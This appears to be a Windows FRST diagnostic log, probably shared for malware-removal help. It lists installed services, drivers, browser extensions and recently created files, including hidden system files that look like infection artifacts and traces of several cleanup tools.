CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-16]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-15]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed]
R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited)
S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> )
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.)
R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft)
R3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes)
R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. ->  )
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.)
R2 RIM Tunnel Service; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe [1355000 2015-05-26] (BlackBerry Ltd. -> BlackBerry Limited)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246872 2017-11-17] (Synaptics Incorporated -> Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6889232 2015-12-14] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 Accelerometer; C:\Windows\system32\DRIVERS\Accelerometer.sys [43840 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 AgereSoftModem; C:\Windows\system32\DRIVERS\agrsm64.sys [1230104 2015-08-05] (Microsoft Windows Hardware Compatibility Publisher -> LSI Corporation)
S3 androidusb; C:\Windows\System32\Drivers\wsadb.sys [38008 2017-11-10] (Anvsoft Inc. -> Google Inc)
S3 blackberryncm; C:\Windows\system32\DRIVERS\blackberryncm6_AMD64.sys [25600 2015-01-23] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 btwavdt; C:\Windows\system32\DRIVERS\btwavdt.sys [230656 2015-03-13] (Broadcom Corporation -> Broadcom Corporation.)
S3 BTWUSB; C:\Windows\System32\Drivers\btwusb.sys [66136 2015-11-25] (Broadcom Corporation -> Broadcom Corporation.)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 e1cexpress; C:\Windows\system32\DRIVERS\e1c64x64.sys [468752 2014-07-29] (Intel Corporation -> Intel Corporation)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [153328 2019-01-08] (Malwarebytes Corporation -> Malwarebytes)
R0 hpdskflt; C:\Windows\System32\DRIVERS\hpdskflt.sys [31040 2012-09-24] (Hewlett-Packard Company -> Hewlett-Packard Company)
S3 hwdatacard; C:\Windows\system32\DRIVERS\ewusbmdm.sys [116864 2009-06-03] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [127136 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [72864 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [274416 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\DRIVERS\mwac.sys [114040 2019-02-16] (Malwarebytes Corporation -> Malwarebytes)
S3 Netaapl; C:\Windows\system32\DRIVERS\netaapl64.sys [23040 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
R3 NETwNe64; C:\Windows\system32\DRIVERS\NETwew00.sys [3349984 2014-03-08] (Intel Corporation-Mobile Wireless Group -> Intel Corporation)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [80384 2015-01-14] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 rimvndis; C:\Windows\System32\Drivers\rimvndis6_AMD64.sys [18432 2015-05-26] (Microsoft Windows Hardware Compatibility Publisher -> BlackBerry Limited)
R3 RimVSerPort; C:\Windows\system32\DRIVERS\RimSerial_AMD64.sys [44544 2012-12-10] (Microsoft Windows Hardware Compatibility Publisher -> Research in Motion Ltd)
R3 SPUVCbv; C:\Windows\System32\Drivers\SPUVCbv64.sys [749824 2017-11-27] (Sunplus Innovation Technology Inc. -> Sunplus Innovation Technology Inc.)
S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2018-04-18] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-16 09:55 - 2019-02-16 09:55 - 000072864 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000274416 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000127136 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-02-16 09:54 - 2019-02-16 09:54 - 000114040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-02-16 07:59 - 2019-02-16 07:59 - 000002719 _____ C:\Users\Stanley\Desktop\JRT.txt
2019-02-16 07:45 - 2019-02-16 07:53 - 000001638 _____ C:\Users\Stanley\Desktop\Rkill.txt
2019-02-16 07:45 - 2019-02-16 07:45 - 000000000 ____D C:\Users\Stanley\Desktop\rkill
2019-02-16 07:38 - 2019-02-16 07:44 - 000696026 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.38.18_log.txt
2019-02-16 07:35 - 2019-02-16 07:36 - 000004670 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.35.18_log.txt
2019-02-16 07:31 - 2019-02-16 07:31 - 000004416 _____ C:\TDSSKiller.3.1.0.26_16.02.2019_07.31.06_log.txt
2019-02-16 07:23 - 2019-02-16 07:26 - 000000000 ____D C:\AdwCleaner
2019-02-15 02:09 - 2019-02-15 02:10 - 000002383 _____ C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk
2019-02-15 02:09 - 2019-02-15 02:09 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk
2019-02-15 02:08 - 2019-02-15 02:08 - 000002427 _____ C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk
2019-02-15 00:32 - 2019-02-15 00:32 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbam
2019-02-15 00:31 - 2019-02-15 00:31 - 000001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-02-15 00:31 - 2019-02-15 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\mbamtray
2019-02-15 00:30 - 2019-02-15 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-02-15 00:30 - 2019-02-15 00:30 - 000000000 ____D C:\Program Files\Malwarebytes
2019-02-15 00:30 - 2019-01-08 15:32 - 000153328 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-02-14 02:41 - 2019-02-16 09:02 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\uTorrent
2019-02-13 22:08 - 2019-02-14 02:40 - 000000414 _____ C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job
2019-02-13 22:08 - 2019-02-13 22:08 - 000003256 _____ C:\Windows\System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmonfs.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\SysWOW64\Drivers\winmon.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\taskshostservices.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 _RSHD C:\Windows\mssecsvc.exe
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SysWOW64\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\system32\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SpeechsTracing
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\SecureBootThemes
2019-02-12 18:33 - 2019-02-12 18:33 - 000000000 ____D C:\Windows\AppDiagnostics
2019-02-12 18:32 - 2019-02-13 14:18 - 000000000 ____D C:\Program Files (x86)\SMADAV
2019-02-12 18:32 - 2019-02-13 05:55 - 000000000 __SHD C:\[Smad-Cage]
2019-02-12 18:32 - 2019-02-12 18:32 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Smadav
2019-02-12 18:31 - 2019-02-12 18:31 - 001698648 _____ (Smadsoft ) C:\Users\Stanley\Downloads\smadav2019rev126.exe
2019-02-12 18:05 - 2019-02-12 18:06 - 064531912 _____ (Malwarebytes ) C:\Users\Stanley\Downloads\mb3-setup-consumer-3.7.1.2839-1.0.538-1.0.9208.exe
2019-02-12 17:43 - 2019-02-16 09:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC Browser
2019-02-12 05:59 - 2019-02-12 05:59 - 000104160 _____ C:\Users\Stanley\Downloads\Shortcut.txt
2019-02-12 05:53 - 2019-02-17 12:44 - 000000000 ____D C:\Users\Stanley\Downloads\FRST
2019-02-12 05:33 - 2019-02-17 12:44 - 000000000 ____D C:\FRST
2019-02-10 21:40 - 2019-02-10 21:40 - 000001483 _____ C:\Users\Stanley\Desktop\iexplore.exe - Shortcut.lnk
2019-02-10 07:29 - 2019-02-10 07:34 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-500
2019-02-10 07:28 - 2019-02-10 07:28 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 20:12 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Apple Computer
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Hewlett-Packard
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\OpenVPN
2019-02-10 07:25 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Apple Computer
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator\AppData\Local\Packages
2019-02-10 07:24 - 2019-02-10 07:25 - 000000000 ____D C:\Users\Administrator
2019-02-10 07:24 - 2019-02-10 07:24 - 000001442 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-02-10 07:24 - 2019-02-10 07:24 - 000000020 ___SH C:\Users\Administrator\ntuser.ini
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Roaming\Adobe
2019-02-10 07:24 - 2019-02-10 07:24 - 000000000 ____D C:\Users\Administrator\AppData\Local\Google
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-02-10 07:24 - 2014-11-22 04:18 - 000000369 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-02-09 02:21 - 2019-02-09 02:21 - 000000000 ____D C:\Windows\pss
2019-02-09 01:24 - 2019-02-09 01:24 - 000000146 _____ C:\Users\Stanley\Desktop\Windows Defender - Shortcut.lnk
2019-02-08 22:53 - 2019-02-08 22:56 - 007406936 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-02-08 22:53 - 2019-02-08 22:56 - 001536112 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2019-02-08 22:53 - 2019-02-08 22:53 - 000000000 ____D C:\Users\#Strazzo.RoseGold##
2019-02-07 05:47 - 2019-02-07 05:47 - 000001178 _____ C:\Users\Public\Desktop\PhoneRescue.lnk
2019-02-07 05:40 - 2019-02-07 08:03 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Decipher Media
2019-02-07 05:25 - 2019-02-07 05:36 - 045726776 _____ (Decipher Media) C:\Users\Stanley\Downloads\DecipherBackupRepair.exe
2019-02-07 04:32 - 2019-02-07 04:39 - 040754877 _____ (iMacTools ) C:\Users\Stanley\Downloads\iBackupViewerSetup.exe
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\iBackup Viewer
2019-02-07 04:26 - 2019-02-07 04:26 - 000000000 ____D C:\Users\Stanley\AppData\Local\CrashRpt
2019-02-07 03:11 - 2019-02-07 03:11 - 000000000 ____D C:\Users\Stanley\Documents\Apowersoft
2019-02-07 03:10 - 2019-02-07 03:10 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Apowersoft
2019-02-07 02:04 - 2019-02-07 02:04 - 000000000 ____D C:\Users\Stanley\AppData\Local\Reincubate Temporary Files
2019-02-06 20:03 - 2019-02-06 20:06 - 006258864 _____ (iMobie Inc. ) C:\Users\Stanley\Downloads\phonebrowse-64-setup.exe
2019-02-06 19:48 - 2019-02-06 19:54 - 021424360 _____ (Reincubate Ltd) C:\Users\Stanley\Downloads\iphonebackupextractor-latest.exe
2019-02-06 05:53 - 2019-02-15 01:38 - 000000000 ____D C:\Users\Stanley\Downloads\MM_VideoDownload
2019-02-06 05:53 - 2019-02-06 05:53 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobiMoverUI
2019-02-06 05:30 - 2019-02-06 05:47 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\SystemAcCrux
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\WindSolutions
2019-02-06 04:46 - 2019-02-06 06:33 - 000000000 ____D C:\ProgramData\WindSolutions
2019-02-06 04:46 - 2019-02-06 04:46 - 000000000 ____D C:\Users\Stanley\AppData\Local\FoneDog
2019-02-06 04:26 - 2019-02-06 04:27 - 008046792 _____ (WindSolutions) C:\Users\Stanley\Downloads\Install_CopyTransControlCenter.exe
2019-02-06 04:23 - 2019-02-06 04:23 - 000000000 ____D C:\Users\Stanley\AppData\Local\Aiseesoft Studio
2019-02-05 11:35 - 2019-02-06 04:26 - 030804013 _____ (FoneDog ) C:\Users\Stanley\Downloads\fonedog-ios-toolkit.exe
2019-02-05 11:35 - 2019-02-05 11:35 - 000001133 _____ C:\Users\Stanley\Desktop\Syncios.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002343 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000002331 _____ C:\Users\Public\Desktop\Syncios Data Recovery.lnk
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Syncios
2019-02-05 07:42 - 2019-02-05 07:42 - 000000000 ____D C:\Program Files (x86)\Syncios Data Recovery
2019-02-05 01:46 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple Computer
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\Documents\Wondershare
2019-02-05 00:51 - 2019-02-05 00:51 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\MobileBackupForeverIni
2019-02-05 00:50 - 2019-02-05 00:50 - 000000000 ____D C:\Users\Stanley\AppData\Local\AdvinstAnalytics
2019-02-05 00:49 - 2019-02-05 00:49 - 000140800 _____ C:\Users\Stanley\AppData\Local\installer.dat
2019-02-05 00:31 - 2019-02-05 01:39 - 000000000 ____D C:\Users\Stanley\AppData\Local\Deployment
2019-02-05 00:31 - 2019-02-05 00:31 - 000000000 ____D C:\Users\Stanley\AppData\Local\Apps\2.0
2019-02-04 23:57 - 2019-02-04 23:57 - 000000000 ____D C:\Users\Stanley\AppData\Local\DigiDNA
2019-02-04 23:54 - 2019-02-05 00:05 - 112497792 _____ C:\Users\Stanley\Downloads\setup_syncios (1).exe
2019-02-04 22:32 - 2019-02-04 22:32 - 000000000 ____D C:\Users\RoseGold\Documents\Syncios
2019-02-02 10:43 - 2019-02-02 10:43 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Apple
2019-01-31 12:39 - 2019-01-31 12:39 - 000048210 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-23 at 1.56.07 PM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM.jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000052446 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-21 at 11.46.14 AM (1).jpeg
2019-01-31 10:20 - 2019-01-31 10:20 - 000046824 _____ C:\Users\Stanley\Downloads\WhatsApp Image 2019-01-20 at 8.50.51 PM.jpeg
2019-01-31 10:17 - 2019-01-31 10:17 - 000046880 _____ C:\Users\Stanley\Downloads\usd slip1.jpeg
2019-01-30 07:56 - 2019-02-10 07:34 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1004
2019-01-30 07:52 - 2019-01-31 06:21 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\hpqlog
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios
2019-01-30 07:51 - 2019-02-05 01:46 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Apple Computer
2019-01-30 07:51 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\.android
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Syncios Data Transfer
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\SyncDroid
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Research In Motion
2019-01-30 07:51 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold\AppData\Local\BlackBerry
2019-01-30 07:48 - 2019-02-12 06:38 - 000001446 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-30 07:48 - 2019-01-30 07:52 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Packages
2019-01-30 07:48 - 2019-01-30 07:51 - 000000000 ____D C:\Users\RoseGold
2019-01-30 07:48 - 2019-01-30 07:48 - 000000020 ___SH C:\Users\RoseGold\ntuser.ini
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Roaming\Adobe
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\VirtualStore
2019-01-30 07:48 - 2019-01-30 07:48 - 000000000 ____D C:\Users\RoseGold\AppData\Local\Google
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2019-01-30 07:48 - 2014-11-22 04:18 - 000000369 _____ C:\Users\RoseGold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2019-01-27 09:06 - 2019-01-27 09:06 - 000202698 _____ C:\Users\Stanley\Downloads\114328 (1).pdf
2019-01-27 08:22 - 2019-01-27 08:22 - 000202698 _____ C:\Users\Stanley\Downloads\114328.pdf
2019-01-26 22:39 - 2019-01-26 22:39 - 000001160 _____ C:\Users\Stanley\Downloads\converted_1082592538.txt
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ___HD C:\OneDriveTemp
2019-01-26 22:19 - 2019-01-26 22:19 - 000000000 ____D C:\Users\Stanley\OneDrive
2019-01-26 14:55 - 2019-01-26 14:55 - 000075241 _____ C:\Users\Stanley\Downloads\newocr.com-20190126135542.pdf
2019-01-26 14:01 - 2019-01-26 14:01 - 000351579 _____ C:\Users\Stanley\Downloads\001 (2).pdf
2019-01-26 13:59 - 2019-01-26 13:59 - 000315587 _____ C:\Users\Stanley\Downloads\001 (1).pdf
2019-01-26 13:53 - 2019-01-26 13:53 - 000271265 _____ C:\Users\Stanley\Downloads\topdf.zip
2019-01-26 13:53 - 2019-01-26 13:52 - 000315587 _____ C:\Users\Stanley\Downloads\001.pdf
2019-01-26 06:02 - 2019-01-26 06:02 - 000001759 _____ C:\Users\Public\Desktop\iTunes.lnk
2019-01-26 06:02 - 2019-01-26 06:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2019-01-26 06:01 - 2019-01-26 06:01 - 000000000 ____D C:\Program Files\iPod
2019-01-26 06:00 - 2019-01-26 06:02 - 000000000 ____D C:\Program Files\iTunes
2019-01-26 05:48 - 2019-01-26 05:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2019-01-22 12:20 - 2019-01-22 12:21 - 000860720 _____ C:\Users\Stanley\Downloads\Ηλεκτρολογικός εξοπλισμός.2016714105916.xlsx
2019-01-21 12:46 - 2019-01-21 12:46 - 003864349 _____ C:\Users\Stanley\Downloads\GPP002-Schneider-Ersatzteile (1).xlsx
2019-01-21 09:17 - 2019-01-21 09:17 - 000215164 _____ C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI222.srt
2019-01-21 02:12 - 2018-12-14 15:23 - 000107584 ____N C:\Users\Stanley\Downloads\Hunter.Killer.2018.HC.HDRip.XviD.AC3-EVO-HI.srt
2019-01-21 02:09 - 2019-01-21 09:18 - 000039742 _____ C:\Users\Stanley\Downloads\hunter_killer_english_1340435.zip
2019-01-19 16:06 - 2019-02-10 22:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Monopoly Here & Now Edition
2019-01-19 16:06 - 2019-01-19 16:06 - 000000000 ____D C:\ProgramData\TEMP
2019-01-19 16:02 - 2019-01-19 16:03 - 015141368 _____ C:\Users\Stanley\Downloads\MonopolyHNSetup.exe

==================== One month (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-02-17 12:47 - 2018-05-12 16:21 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\uTorrent
2019-02-17 07:59 - 2018-06-03 09:29 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\vlc
2019-02-16 10:34 - 2018-05-03 17:58 - 000003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1692593245-3285590566-2148222763-1001
2019-02-16 09:05 - 2014-11-22 04:09 - 000176404 _____ C:\Windows\system32\PerfStringBackup.INI
2019-02-16 09:05 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2019-02-16 09:02 - 2018-12-27 19:56 - 000000000 ___RD C:\Users\Stanley\iCloudDrive
2019-02-16 09:00 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-02-16 08:59 - 2018-06-03 04:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DMCache
2019-02-16 07:54 - 2018-05-12 16:22 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\ProgramData\Lavasoft
2019-02-16 07:54 - 2018-05-12 16:21 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-02-16 07:32 - 2013-08-22 14:25 - 000524288 ___SH C:\Windows\system32\config\BBI
2019-02-16 06:09 - 2018-05-09 14:30 - 000507392 ___SH C:\Users\Stanley\Downloads\Thumbs.db
2019-02-16 05:57 - 2018-05-04 17:06 - 000003842 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1525449700
2019-02-16 05:57 - 2018-05-04 17:01 - 000001050 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2019-02-16 05:57 - 2018-05-04 17:00 - 000000000 ____D C:\Program Files\Opera
2019-02-15 01:31 - 2018-05-04 07:27 - 000000000 ____D C:\Users\Stanley\AppData\Roaming\DriverPack Easy Search
2019-02-15 00:15 - 2018-06-24 08:33 - 000002320 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-02-15 00:08 - 2018-05-22 09:22 - 000168960 ___SH C:\Users\Stanley\Desktop\Thumbs.db
2019-02-15 00:03 - 2018-06-04 23:16 - 000000000 ____D C:\Users\Stanley\AppData\LocalLow\Temp
2019-02-14 02:43 - 2018-05-04 20:08 - 000001326 _____ C:\Users\Public\Desktop\Skype.lnk
2019-02-14 02:43 - 2018-05-04 20:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2019-02-14 02:25 - 2018-04-23 21:43 - 000000000 ____D C:\lNTEL
